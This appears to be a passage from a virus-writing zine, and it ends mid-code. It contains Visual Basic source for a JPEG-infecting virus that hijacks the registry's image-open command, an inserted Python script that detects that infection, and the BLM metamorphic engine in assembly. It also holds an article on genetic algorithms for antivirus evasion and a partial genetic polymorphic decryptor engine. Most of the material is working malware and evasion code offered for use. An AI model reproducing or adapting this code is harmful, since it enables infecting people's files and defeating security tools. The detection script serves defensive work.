GoTo gggoop End If notinfected: '1 infection / run infest (jpgvir & host) Exit For gggoop: Next host g = Replace(jpgvir, "\", "\\") extractXTrktr (g & "extrk.exe") End Sub Function extractXTrktr(name As String) On Error Resume Next Dim a As String Dim jpgvir As String Dim vircode As String Dim extractrcode As String jpgvir = App.Path If Right(jpgvir, 1) <> "\" Then jpgvir = jpgvir & "\" Open jpgvir & App.EXEName & ".exe" For Binary Access Read As #1 vircode = Space(LOF(1) - 5636) extractrcode = Space(5636) Get #1, , vircode Get #1, , extractrcode Close #1 Open jpgvir & "extrk.exe" For Binary Access Write As #2 Put #2, , extractrcode Close #2 Open jpgvir & "reg.mp3" For Output As #3 Print #3, "REGEDIT4" Print #3, "" Print #3, "[HKEY_CLASSES_ROOT\jpegfile\shell\open\command]" Print #3, "@=""" & name & " %1""" Close #3 a = "regedit /s " & jpgvir & "reg.mp3" Shell a End Function Function infest(hostpath As String) On Error Resume Next Dim ffile Dim jpgcode As String Dim jpgvir As String Dim vircode As String ffile = FreeFile jpgvir = App.Path If Right(jpgvir, 1) <> "\" Then jpgvir = jpgvir & "\" Open hostpath For Binary Access Read As #ffile jpgcode = Space(LOF(ffile)) Get #ffile, , jpgcode Close #ffile Open jpgvir & App.EXEName & ".exe" For Binary Access Read As #1 vircode = Space(LOF(1)) Get #1, 1, vircode Close #1 Open hostpath For Binary Access Write As #ffile Put #ffile, , jpgcode Put #ffile, , vircode Close #ffile End Function 'proof.001, part of the first ever jpg virus by alcopaul 'w32.hllp.JPGInfector 'june 13, 2002 ======================= extractor ======================= Attribute VB_Name = "Module1" Option Explicit Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long 
Private iResult As Long Private hProg As Long Private idProg As Long Private iExit As Long Const STILL_ACTIVE As Long = &H103 Const PROCESS_ALL_ACCESS As Long = &H1F0FFF Sub Main() On Error Resume Next Dim HostLength As Long Dim HostCode As String Dim vircode As String Dim comm As String Dim ffile Dim lenhost As String Dim check As String Dim jpgvir As String Dim mark As String jpgvir = App.Path If Right(jpgvir, 1) <> "\" Then jpgvir = jpgvir & "\" ffile = FreeFile comm = Command Open comm For Binary Access Read As #ffile lenhost = (LOF(ffile)) check = Space(lenhost) Get #ffile, , check Close #ffile mark = Right(check, 4) If mark = "alco" Then Open comm For Binary Access Read As #ffile HostLength = (LOF(ffile) - 11780) HostCode = Space(HostLength) vircode = Space(11780) Get #ffile, , HostCode Get #ffile, , vircode Close #ffile Open jpgvir & "x.exe" For Binary Access Write As #ffile Put #ffile, , vircode Close #ffile DoEvents 'borrowed from murkry's vb5 virus idProg = Shell(jpgvir & "x.exe", vbNormalFocus) hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg) GetExitCodeProcess hProg, iExit Do While iExit = STILL_ACTIVE DoEvents GetExitCodeProcess hProg, iExit Loop Kill jpgvir & "x.exe" Else End If Shell "rundll32.exe C:\WINDOWS\SYSTEM\SHIMGVW.DLL,ImageView_Fullscreen " & comm End Sub 'proof.002 - part of the 1st jpg virus by alcopaul 'w32.hllp.JPGInfector 'june 13, 2002 =============== signature =============== alco -------------- Signature string that will be appended to the virus - alco
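A defender's triage for the file layout the source above produces, as an added example that is not part of alcopaul's code: it walks the JPEG markers to the end-of-image marker, reports anything appended after it, and flags the `alco` end marker together with the 11780-byte tail that the extractor reads back. The sample byte strings are constructed, and the `MZ` check assumes the appended program starts with the usual Windows executable header.

```python
import struct

PERRUN_MARK = b"alco"   # infection marker: last 4 bytes of an infected file (from the source above)
PERRUN_SIZE = 11780     # length of the appended program that the extractor reads back


def _skip_scan(data, i):
    """Skip entropy-coded scan data; return the offset of the next real marker."""
    while True:
        j = data.find(b"\xff", i)
        if j < 0 or j + 1 >= len(data):
            return None
        nxt = data[j + 1]
        if nxt == 0x00 or 0xD0 <= nxt <= 0xD7:   # stuffed FF byte or restart marker
            i = j + 2
        elif nxt == 0xFF:                        # fill byte before a marker
            i = j + 1
        else:
            return j


def jpeg_end(data):
    """Return the offset just past the EOI marker, or None if the file is not a JPEG."""
    if data[:2] != b"\xff\xd8":                  # SOI
        return None
    i = 2
    while i + 2 <= len(data):
        if data[i] != 0xFF:
            return None
        marker = data[i + 1]
        if marker == 0xFF:                       # fill byte
            i += 1
        elif marker == 0xD9:                     # EOI: the image ends here
            return i + 2
        elif marker == 0x01 or 0xD0 <= marker <= 0xD7:
            i += 2                               # markers without a length field
        else:
            if i + 4 > len(data):
                return None
            seglen = struct.unpack(">H", data[i + 2:i + 4])[0]
            if seglen < 2:
                return None
            i += 2 + seglen
            if marker == 0xDA:                   # SOS: compressed data follows the header
                i = _skip_scan(data, i)
                if i is None:
                    return None
    return None


def triage(data):
    """Classify a file by what follows the JPEG end-of-image marker."""
    end = jpeg_end(data)
    tail = data[end:] if end is not None else b""
    marked = data[-4:] == PERRUN_MARK
    pe_at_fixed_offset = (len(tail) >= PERRUN_SIZE
                          and data[-PERRUN_SIZE:-PERRUN_SIZE + 2] == b"MZ")
    if end is None:
        verdict = "not-a-jpeg"
    elif marked and pe_at_fixed_offset:
        verdict = "perrun-layout"
    elif tail[:2] == b"MZ":
        verdict = "appended-executable"
    elif tail:
        verdict = "trailing-data"
    else:
        verdict = "clean"
    return {"image_end": end, "appended_bytes": len(tail),
            "end_marker": marked, "verdict": verdict}


# Constructed samples: a structurally valid (not decodable) JPEG marker stream,
# and the same stream with an inert 11780-byte stand-in appended.
CLEAN = (b"\xff\xd8"                      # SOI
         b"\xff\xe0\x00\x04AB"            # APP0 segment, 2 payload bytes
         b"\xff\xda\x00\x04\x00\x00"      # SOS header
         b"\x12\xff\x00\x34\xff\xd0\x56"  # scan data with a stuffed FF and RST0
         b"\xff\xd9")                     # EOI
INFECTED = CLEAN + b"MZ" + b"\x00" * (PERRUN_SIZE - 6) + PERRUN_MARK

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN), ("infected", INFECTED)):
        print(name, triage(blob))
```

On a live system this file check pairs with confirming that `HKEY_CLASSES_ROOT\jpegfile\shell\open\command` still points at the expected image viewer, since the source above rewrites that value to `extrk.exe`.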

articles

Hackers’ Network Security Handbook assassin007 assassin007 wrote a 400 pages book called "Hackers’ Network Security Handbook". it used to be online at netsec.nnsol.com, but the page is down. there are no articles by him here, cause all are part of the book. i got the whole book as pdf, but i didn't want to violate his copyright, so i left the book (and parts of it) out of this zine. but when you're interested, drop me a mail, perhaps i'll hand out the pdf. philie

sources

BLM ~ BlueOwls Light Meta BlueOwl ; BLM ~ BlueOwls Light Meta ; ************************* ; ; Details ; ; Name: BLM (BlueOwls Light Meta) ; Date: 16 May 2005 ; Size: 412 bytes ; Morphing power: light ; Morphing type: non-expansion ; Compatibility: most common x86 and pentium specific (rdtsc/movzx/..) ; Platforms: all 32bit (and maybe 16bit) x86 instruction set OSes ; Used compiler: FASM 1.60 ; Bugs: hopefully none ; ; Morphing ; ; The following instructions can be morphed: ; ; 1. OP reg, reg -> changing the D bit (2) ; 2. OP (reg,) [(imm32+)reg] -> changing the unused SCALE bits (4) ; 3. OP (reg,) [(imm32+)reg+reg*1] -> swapping the regs (2) ; ; Any other instruction's size is calculated and skipped. ; ; Usage notes ; ; BLM can be usefull for any application which would like to do code ; morphing on its own, or other code. There are however, some things ; to keep note on: ; ; - Make sure you don't mix data with code, for example: ; > CALL _LABEL ; > DB "some string",0 ; > _LABEL: ; Would make the meta miscorrectly assume "some string",0 to be ; code. So make sure that in the codearea you specify is no data. ; - On input, esi is allowed to equal edi, but it is not recommended ; if it will cause the meta to morph itself on runtime. ; - This code does not need any data, and only needs to be able to ; execute. It is completely permutatable. ; ; Agreement ; ; This sourcecode is meant to be used in freeware and shareware ; programs, and therefor it is strictly prohibited to add any of this ; code in binary or source format in scan strings or other detection ; methods. If done, it will impact on the sellability of the product, ; and can result in high fees and/or trials before court. 
; YOU HAVE BEEN WARNED use32 ; ÄÄÄÄÄÄÄÄÄÄÄÄÄ META SOURCE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; in: esi(ecx) = start of code to morph ; edi(ecx) = start of buffer to put morphed code in ; ecx = size of code to morph (and buffer) ; out: esi = esi + ecx ; edi = edi + ecx ; other registers are destroyed (except esp) BLM: cld lea ebx, [esi+ecx] ; ebx = ptr to end of code to morph nextcode: push ebx xor ecx, ecx push 4 pop ebx call .innext pop ebx rol edx, 7 ; simple RAND function neg dx cmp ebx, esi ja nextcode ret .next: movsb .innext: mov al, [esi] and al, 11100111b cmp al, 00100110b ; es/cs/ss/ds segment? jz .next ; check if more mov al, [esi] and al, 11111110b cmp al, 01100100b ; fs/gs segment? jz .next ; check if more cmp al, 11110010b ; repz/repnz? jz .next ; check if more cmp al, 01100110b ; WORD? jnz opcode mov bl, 2 ; set WORD size jmp .next ; ----------------------------------------------------------------------- opcode: mov al, [esi] cmp al, 0fh jnz branch_start movsb or al, [esi] ; ????1111 cmp al, 10001111b jz .6byte ; -> jxx label32 cmp al, 10111111b jz .3byte ; -> movzx/bt? 
jmp .done .6byte: movsb movsb movsb .3byte: movsb .done: movsb ret branch_start: shl al, 1 jc branch_1xxxxxxx branch_0xxxxxxx:shl al, 1 jc branch_01xxxxxx branch_00xxxxxx:shl al, 4 jnc op_rmrm_d op_eax: mov al, [esi] shr al, 1 jc .pr32 movsb movsb ret ; -> op al, imm8 .pr32: add ecx, ebx ; -> op eax, imm32 rep movsb movsb ret branch_01xxxxxx:cmp al, 11000000b jb .ncjump movsb ; -> jxx label8 .ncjump: cmp al, 068h jz do_5byte ; -> push imm32 cmp al, 06ah jnz .done ; -> popad/pushad/pop/push/dec/inc (reg) stosb ; -> push imm8 .done: movsb ret op_rmrm_d: mov al, [esi+1] ; -> add/or/adc/sbb/and/sub/xor/cmp r/m,r/m rcr edx, 1 ; rand true/false jc .nomorph cmp al, 11000000b .nomorph: jb op_rm ; (jc == jb so little optimization) lodsb xor al, 00000010b stosb lodsb and eax, 00111111b ; 00000000 00regreg shl eax, 5 ; 00000reg reg00000 shr al, 2 ; 00000reg 00reg000 or al, ah ; 00000xxx 00regreg or al, 11000000b ; 11regreg stosb ret branch_1xxxxxxx:shl al, 1 jc branch_11xxxxxx branch_10xxxxxx:shl al, 1 jc branch_101xxxxx branch_100xxxxx:shl al, 1 jc branch_01xxxxxx.ncjump ; -> xchg eax,reg/cwde/cdq/pushf/popf/sahf/lahf branch_1000xxxx:cmp al, 01000000b jae op_rm ; -> test/xchg/mov/lea/pop r/m(,r/m) shl al, 3 jc op_rmimm8 ; -> add/or/adc/sbb/and/sub/xor/cmp r/m,imm8 jmp op_rmimm32 ; -> add/or/adc/sbb/and/sub/xor/cmp r/m,imm32 branch_101xxxxx:shl al, 1 jc branch_1011xxxx branch_1010xxxx:and al, 11100000b cmp al, 00100000b jb op_eax ; -> test eax, imm cmp al, 10000000b jz do_5byte ; -> mov mem32, eax movsb ret ; -> movs/stos/lods/scas branch_1011xxxx:shl al, 1 jnc branch_1100001x.2byte ; -> mov reg, imm8 jmp op_eax.pr32 ; -> mov reg, imm32 do_5byte: movsd movsb ret branch_11xxxxxx:shl al, 1 jc branch_111xxxxx branch_110xxxxx:shl al, 1 jc branch_1101xxxx branch_1100xxxx:cmp al, 11010000b jz branch_1100001x.2byte ; -> int imm8 shl al, 1 jc branch_1100001x.done ; -> leave/int 3 branch_11000xxx:shl al, 1 jc op_rm_w ; -> mov r/m, imm branch_110000xx:shl al, 1 jc branch_1100001x inc 
ecx ; -> rol/ror/rcl/rcr/shl/shr/sal/sar reg, 1 jmp op_rm branch_1100001x:shl al, 1 jc .done .3byte: movsb .2byte: movsb ; -> ret imm16 .done: movsb ret ; -> ret branch_1101xxxx:shl al, 2 jc branch_1100001x.done ; -> xlatb branch_1101x0xx:jmp op_rm ; -> rol/ror/rcl/rcr/shl/shr/sal/sar reg, 1 branch_111xxxxx:shl al, 1 jc branch_1111xxxx branch_1110xxxx:shl al, 1 jnc branch_11101010 ; -> loop label branch_11101xxx:cmp al, 00100000b jz branch_111010x0.done ; -> call label branch_111010x0:shl al, 2 jc branch_11101010 .done: movsd ; -> jmp label32 movsb ret branch_11101010:movsb movsb ret ; -> jmp label8 branch_1111xxxx:shl al, 1 jc branch_11111xxx branch_11110xxx:shl al, 2 jnc branch_11111xxx.done ; -> cmc branch_11111x1x:mov al, [esi+1] ; al = modr/m and al, 00111000b jnz op_rm ; -> not/mul/div/idiv jmp op_rm_w ; -> test branch_11111xxx:shl al, 1 jc .done ; -> clc/stc/cli shr al, 1 jc op_rm ; -> inc/dec/call/jmp/push .done: movsb ret ; -> cld/std ; ----------------------------------------------------------------------- op_rm_w: mov al, [esi] shr al, 1 jnc op_rmimm8 op_rmimm32: add ecx, ebx ; imm length will be 4 or 2 dec ecx op_rmimm8: inc ecx ; imm length = 1 byte op_rm: movsb lodsb stosb cmp al, 11000000b ; op reg, reg jae .done mov ah, al and al, 111b shr ah, 6 jz .regaddr cmp ah, 00000001b jz .ddone add ecx, 3 ; op reg, [reg+dword] .ddone: inc ecx ; op reg, [reg+byte] .cmpsib: cmp al, 00000100b jnz .done xor ebx, ebx mov eax, ebx lodsb ; 00000000 iiregreg shl eax, 2 ; 000000ii regreg00 xchg bl, ah ; 00000000 regreg00 shl eax, 3 ; 00000reg reg00000 shr al, 5 ; 00000reg 00000reg cmp ah, 4 jz .randindex cmp al, 4 jz .nosib or bl, bl ; index = 1? 
jnz .nosib rcr edx, 1 jnc .nosib ; randomly abort switch xchg al, ah jmp .nosib .randindex: mov bl, dl ; index is random and bl, 00000011b .nosib: shl al, 5 ; 00000reg reg00000 shr eax, 3 ; 00000000 regreg00 mov ah, bl ; 000000ii regreg00 shr eax, 2 ; 00000000 iiregreg stosb .done: rep movsb ret .regaddr: cmp al, 00000101b ; op reg, [dword] jnz .cmpsib movsd jmp .done ; ÄÄÄÄÄÄÄÄÄÄÄÄÄ META BINARY ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; in: esi(ecx) = start of code to morph ; edi(ecx) = start of buffer to put morphed code in ; ecx = size of code to morph (and buffer) ; out: esi = esi + ecx ; edi = edi + ecx ; other registers are destroyed (except esp) ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

articles

Implementing genetic algorithms in viruses BlueOwl

Implementing genetic algorithms in viruses
by BlueOwl
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Introduction
************

I have personally always been fascinated by evolution and am a strong believer that it is the truth about how organisms evolve. I have also spent many thoughts and codes and readings trying to figure out if it could also be implemented in computer viruses, of course something completely different. Normally computer viruses either don't change themselves (static), they encrypt themselves with one or multiple decryptors or they completely change their body (hard to do). With the second and the third way viruses try to completely change their layout / code use / register use etc. This theory will try to prove that another way could be better.

!Note! In this theory I mainly describe how a file-infecting virus could use genetics. This can however be applied to any spreading program including worms, as long as you can be creative.

Darwinian evolution - theory
****************************

Ok, so in short. What is Darwinian evolution? Let us assume we have one species, let us say dogs. And let's assume that they are put in the jungle without humans around. You probably know there are lots of different dogs. Small, thin, big, with long/small tails, large/small beaks etc. etc. So all these different ones are dumped into the jungle. Some would die because they could not find something to eat. Some because they were caught and eaten by lions. Some would fall and drown in rivers. Etc. But as you could imagine: from all those tens of thousands of dogs a few would still probably survive, because they were best adapted to the jungle. These remaining dogs would then mate and produce offspring. Some of these new dogs would be better adjusted to the environment, some worse. So some of this new generation would die but a lot of them would not, because they resembled their dog parents which *could* survive.

With Darwinian evolution it is all about this. The strongest survive, and the offspring of these strongest will survive even better or worse, ultimately creating the "perfect" species.

So in short
***********

Okay, so reading from the text above there are three core factors:

- Each individual has a certain DNA which determines what it is: small, thin, with long hair/short hair etc.
- The environment kills individuals with certain characteristics, for example some dogs have long legs to run fast with so they can outrun lions, the ones with short legs are killed and eaten.
- Dogs which *do* survive because of their positive characteristics will produce offspring which resembles them, thus they have a lot of the same characteristics but with a small number of changes. These changes will determine whether this individual will do better or worse than its parents.

Binary organisms
****************

This theory said, let's talk about modern computer viruses and evolution theory. What's the use of genetics in computer viruses? In the virus world, of course, there are no "natural" enemies. No lions, rivers, etc. etc. There is only one enemy: antiviruses. When an antivirus finds a virus, it will be removed. Killed. To detect viruses antiviruses have 2 ways: virus specific and virus unspecific (heuristic).

The first method means a virus on the loose is 'caught'. Someone who is infected by it sends it over to antivirus offices for analysing. It will get fully or partially analysed by antivirus personnel and a detection routine for it is generated. This is sent to all people owning the antivirus and thus they become 'immune' to the virus.

The second way for detecting viruses in general is for the antivirus to check for virus-like signs and suspicious things. What kind of things are suspicious and what things are not have been decided by the software authors. Some viruses will not get detected though, because they don't match the 'description'. The programmer cannot add an unlimited number of 'recognisers' because the more he adds the higher the chance will be that a non-virus will fit the description.

Binary and biologic: the connection
***********************************

First let us talk about unspecific detection. With this detection viruses are detected on what they do. The antivirus can detect them on the changes they make to files they infect. But as I said before: some viruses *do not* get detected. This is of course because each virus can have its own way of doing it. If we would compare this with a dog with long or short legs, we get a remarkably good comparison. If a dog has short legs he dies, and with long legs he survives. If a virus has one way of infecting it gets detected, if it uses another it does not.

So what way is best for the virus to use? That's unknown. Just like a dog with short or long legs does not *know* if it will survive, a virus won't either. For the dog species in total it is not a problem. Some dogs will die but new dogs will take their places. For a virus species it *is* a problem. Simply because there are no different kinds of one virus. Even if the virus is polymorphic (self changing), it will still be a problem because a polymorphic virus survivor has no way of 'knowing' what combination worked. So it would be like a long-legged parent getting both long-legged and short-legged offspring.

Here the idea of genetics and DNA for viruses comes to mind. What if the virus could 'remember' what kind of infection it did and pass it on with some slight modifications to its children? If it did that it could truly evolve like the dogs would.

The same goes for specific detection. Let us say the antivirus researcher analyses the virus and finds a kind of infection. It is added to the virus database and all viruses using that kind will be detected and removed. Viruses using another one because of other DNA won't be removed and will take the place of the previous virus sample. That way virus evolution is complete: as long as not *ALL* virus samples have been added to the detection database, some will escape detection, live on and breed.

Genetic algorithms
******************

Genetic algorithms can be considered reasonably simple with a few things maybe harder to understand (and code). The structure of the, in my opinion, best genetic engine would be (explained later):

For each file to infect:
1) Save virus DNA
2) Mutate virus DNA
3) Infect file
4) Restore virus DNA

Firstly let us talk about the infection of the file. In this routine every possible genetic step (*) is made in the way of:

> if (stepxgene==0){ do first way } else { do second way }

To make the process more efficient it is easiest to give all steps a fixed number of possibilities, e.g. four possibilities each. This will help in determining the way you are going to -store- the DNA. If you are thinking about multiple DNA steps per byte I would encourage you to use a number in the range of 2^... so you can use the maximum number of bits available.

Why the save/mutate/restore is done may be a little bit harder to understand. The ultimate reason is the fact that this way the file will be infected according to the DNA of the virus's OFFSPRING. That way the offspring 'knows' *exactly* what it consists of. If the virus would only give its copy a mutated DNA under infection, evolution would stay behind a little. E.g. a virus has DNA A and infects a file in way A but gives its copy DNA B. Also a problem is the fact that all files infected by one virus will be infected in exactly the same way. And you don't see all the puppies of a dog look the same.

Selecting appropriate genes
***************************

What to make genetic and what not is another topic to think about and it is debatable. The real question is whether or not something is useful to be genetic. E.g. human hair colour is genetic, but fingerprints are different even with one-egg twins. Fingerprints were clearly of no importance through the evolution of man. You can add anything which you like to make genetic, but a problem comes up when you have something like:

    if(gene==0){
        ...
        if (anothergene==0){ ... } else { ... }
        ...
    } else {
        ...
        if (yetanothergene==0){ ... } else { ... }
        ...
    }

Of course it is possible, but when you look at it more closely you will notice that the importance of a gene declines, e.g.:

    if (...){ if (...){ if (...){ ... } ..}..}

If the first "if" gene mutates, all the inner genes won't get executed anymore, and a much bigger adaptation is made than when an inner gene is changed. So to be 'fair' you would have to make the chance of mutation smaller on more important genes. It is a problem which you can live with but I would recommend trying to avoid it and keeping it in this format:

    if (...) { ... } ...
    if (...) { ... } ...
    if (...) { ... } ...
    ...

Furthermore, do not get carried away when creating genes. I mean do not create a self destruct gene. ;) And make sure all options are compatible! The best way to test for this is to put all genes first to zero, then to one etc. up to the end number of different options. You can't test all combinations individually anyway.

Mutations
*********

Mutations are the essence of evolution. Without them, of course, everything would stay the same. So the engine should make a change sometimes. However this is another thing to think about: how often should something be changed? If too much is changed viruses could be completely different too soon and the effect of evolution lost. But if it changed too slowly it could be not variable enough to escape detection and come up with new ways. Anyway, it is debatable. Furthermore, the number of possible mutations also shouldn't be static. So to stick to nature, every gene should independently have a certain chance of changing. My algorithm is (ASM):

    call rand          ; eax = random
    xchg eax, edx      ; (each bit has a chance of 1 in 2 to be 1)
    call rand          ; eax = random
    and edx, eax       ; chance 1 in 4
    call rand
    and edx, eax       ; chance 1 in 8
    call rand
    and edx, eax       ; chance 1 in 16
    call rand
    and edx, eax       ; chance 1 in 32

So in this example, at the end, every bit in edx has a chance of one in thirty-two to be 1, while all others are zero. Thus because a dword consists of 32 bits, the average should be one bit set to 1 each time at the end of this proc. However 0, 2, 3, 4 ... 32 bits set to 1 are also possibilities, but the chance that all 32 bits are 1 is one in a number of 48 digits. So we are safe to assume too big mutations will almost never happen. So after getting this value we simply xor it with the dna (given the fact it only consists of one dword), giving a small number of mutations or none.

    xor [dna], edx

Code example
************

To give an example of how this *could* be implemented I have coded this simple polymorphic engine. Actually it is not *that* simple and may be hard to understand, since I optimized most things about it. It has 2 parts which contain genetics: a DNA variable (called DNA), and a register container. These are firstly saved at the start of the engine and then the originals are altered. Then it generates a decryptor according to these. The decryptor is generated in the following way: all parts of the decryptor have four possible options (see the part under <call load_table>). So from the DNA each time 2 bits (can be 0,1,2,3) are read and used to pick the correct genetically specified option. If you check this out maybe you will learn some new techniques, but don't try to understand it too much :) (blame my coding style ;)).

Final Word
**********

First of all, I hope you have enjoyed reading my article.
As i am very interested in the subject myself, i liked to write something about this. I have already read other people thinking and writing about this subject, and i like it. I also hope this will enspire you to do new things with your codings, even completely different. This is not *necessarily* the best idea. BlueOwl november 2004 ; ¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤ ; BGPE - BlueOwls Genetic Poly Engine (Simple version) ; Al though this is just a "simple" version, feel free to spread and ; use it in whatever you like, as long as you don't hold me responsible ; AND don't claim it is yours. :) What i was thinking about adding was ; placing all the code blocks in random order, maybe something for a ; next version ;). ; Good luck with it. ; BlueOwl ; BTW. Sorry for not commenting this much, but personally ; in: eax = rnd ; ecx = size of virus in bytes rounded to a dword ((virus_size+3)/4)*4 ; esi = start of virus ; edi = start of outputbuffer ; ; out: eax = size of generated ptr_low equ 0 shl 3 + 6 ptr_high equ 1 shl 3 + 6 ctr_low equ 2 shl 3 + 6 ctr_high equ 3 shl 3 + 6 tmp_low equ 4 shl 3 + 6 ptrtmp equ 5 shl 3 + 6 ptrptr equ 6 shl 3 + 6 ctrctr equ 7 shl 3 + 6 cjmp equ 8 shl 3 + 6 mlbl equ 9 shl 3 + 6 edword equ 10 shl 3 + 6 ebyte equ 11 shl 3 + 6 size_dword equ 12 shl 3 + 6 tmptmp equ 13 shl 3 + 6 ecd equ 14 shl 3 + 6 estart equ ebp-4*1 rna equ ebp-4*2 vsized equ ebp-4*3 lbler equ ebp-4*4 _edword equ ebp+7*4 _ebyte equ ebp-4*5 BGPE: pushad call inner_delta inner_delta: pop ebp push dword [ebp+bgpe_dna-inner_delta] ; save old dna push dword [ebp+lregsstart-inner_delta] ; save old registeruse push dword [ebp+lregsstart+4-inner_delta] ; " " push ebp push ecx lea ecx, [ebp+lregsstart-inner_delta] lea ebx, [ebp+bgpe_dna-inner_delta] mov ebp, esp add ebp, 4 call bgpe_rand xchg edx, eax call bgpe_rand and edx, eax call bgpe_rand and edx, eax call bgpe_rand and edx, eax ; chance 1 in 16 for each bit xor [ebx], edx 
push 7 pop edx xchg ecx, edx mutate_regs: call bgpe_rand test eax, 0111b ; chance of 3 bits being 0 in 8 jnz no_mut mov al, byte [edx] ; swap around register mov byte [edx+1], al no_mut: inc edx loop mutate_regs pop ecx mov al, 0e8h stosb mov eax, ecx stosd push edi shr ecx, 2 db 068h bgpe_dna dd 0 ; 01010101010101010101010101010101b push ecx push eax rep movsd call bgpe_rand push eax call load_table getptr: gp1 db gp2-gp1,ptr_low,58h,ptr_low,50h ; pop reg / push reg gp2 db gp3-gp2,08bh,ptr_high,04h,024h ; mov reg, [esp] gp3 db gp4-gp3,0ffh,034h,024h,ptr_low,058h ; push [esp] / pop reg gp4 db gp5-gp4,00bh,ptr_high,04h,024h,023h,ptr_high,04h,024h ; or reg, [esp] / and reg, [esp] gp5: initcnt: ic1 db ic2-ic1,ctr_low,0b8h,size_dword ; mov reg, value ic2 db ic3-ic2,068h,size_dword,ctr_low,058h ; push value / pop reg ic3 db ic4-ic3,083h,ctr_low,0e0h,000h,081h,ctr_low,0c0h,size_dword ; and reg, 0 / add reg, value ic4 db ic5-ic4,08dh,ctr_high,005h,size_dword ; lea reg, [value] ic5: getdword: gd1 db gd2-gd1,mlbl,087h,ptrtmp,0 ; xchg reg, [reg] gd2 db gd3-gd2,mlbl,0ffh,ptr_low,030h,tmp_low,058h ; push [reg] / pop reg gd3 db gd4-gd3,mlbl,08bh,ptrtmp,0 ; mov reg, [reg] gd4 db gd5-gd4,mlbl,00bh,ptrtmp,000h,023h,ptrtmp,000h ; or reg, [reg] / and reg, [reg] gd5: decryptdword: cy1 db cy2-cy1,08dh,tmptmp,080h,edword,0c1h,tmp_low,0c0h,ebyte,ecd ; lea reg, [reg+value] / rol reg, value push ecx movzx ecx, byte [_ebyte] ror eax, cl pop ecx sub eax, [_edword] ret cy2 db cy3-cy2,0c1h,tmp_low,0c8h,ebyte,0f7h,tmp_low,0d8h,ecd ; ror reg, value / neg reg neg eax push ecx movzx ecx, byte [_ebyte] rol eax, cl pop ecx ret cy3 db cy4-cy3,0fh,tmp_low,0c8h,081h,tmp_low,0f0h,edword,ecd ; bswap reg / xor reg, value xor eax, [_edword] bswap eax ret cy4 db cy5-cy4,081h,tmp_low,0e8h,edword,0f7h,tmp_low,0d0h,ecd ; sub reg, value / not reg not eax add eax, [_edword] ret cy5: putdword: pd1 db pd2-pd1,087h,ptrtmp,0 ; xchg [reg], reg pd2 db pd3-pd2,tmp_low,050h,08fh,ptr_low,000h ; push reg / pop [reg] pd3 
db pd4-pd3,089h,ptrtmp,0 ; mov [reg], reg pd4 db pd5-pd4,021h,ptrtmp,000h,009h,ptrtmp,000h ; and [reg], reg / or [reg], reg pd5: addptr: ap1 db ap2-ap1,08dh,ptrptr,040h,004h ; lea reg, [reg+4] ap2 db ap3-ap2,083h,ptr_low,0c0h,004h ; add reg, 4 ap3 db ap4-ap3,083h,ptr_low,0e8h,0fch ; sub reg, -4 ap4 db ap5-ap4,ptr_low,040h,ptr_low,040h,ptr_low,040h,ptr_low,040h ; 4* inc reg ap5: decctr: dc1 db dc2-dc1,ctr_low,048h ; dec reg dc2 db dc3-dc2,083h,ctr_low,0e8h,001h ; sub reg, 1 dc3 db dc4-dc3,083h,ctr_low,0c0h,0ffh ; add reg, -1 dc4 db dc5-dc4,08dh,ctrctr,040h,0ffh ; lea reg, [reg-1] dc5: conjmp: cj1 db cj2-cj1,009h,ctrctr,0c0h,074h,002h,0ebh,cjmp ; or reg, reg / jz $+4 / jmp label cj2 db cj3-cj2,ctr_low,040h,ctr_low,048h,075h,cjmp ; inc reg / dec reg / jnz label cj3 db cj4-cj3,083h,ctr_low,0f8h,001h,073h,cjmp ; cmp reg, 1 / jnb label cj4 db cj5-cj4,ctr_low,048h,078h,003h,ctr_low,040h,079h,cjmp ; dec reg / js $+3 / inc reg / jns label cj5: doret: rt1 db rt2-rt1,0c3h ; ret rt2 db rt3-rt2,0c2h,000h,000h ; ret 0 rt3 db rt4-rt3,058h,0ffh,0e0h ; pop eax / jmp eax rt4 db rt5-rt4,0ffh,034h,024h,0c2h,004h,00h ; push [esp] / ret 4 rt5: db 0 load_table: pop edx call load_regs lregsstart db 00h,01h,02h,03h,05h,06h,07h load_regs: pop ebx do_decryptor: cmp byte [edx], 0 jz decryptor_done mov esi, edx push 4 pop ecx _reloadnext: movzx eax, byte [edx] add edx, eax loop _reloadnext mov ecx, [rna] shr dword [rna], 2 ; move up rna and ecx, 011b ; put ecx in range 0-3 or ecx, ecx jz this_found _loadthis: movzx eax, byte [esi] add esi, eax loop _loadthis this_found: movzx ecx, byte [esi] dec ecx inc esi process_table: lodsb push eax and eax, 07h cmp eax, 06 pop eax jz special_command or al, ah stosb sub ah, ah resume_process: loop process_table jmp do_decryptor special_command:movzx eax, al ; process special command do_command: shr eax, 3 ; (make label/add register/etc.) 
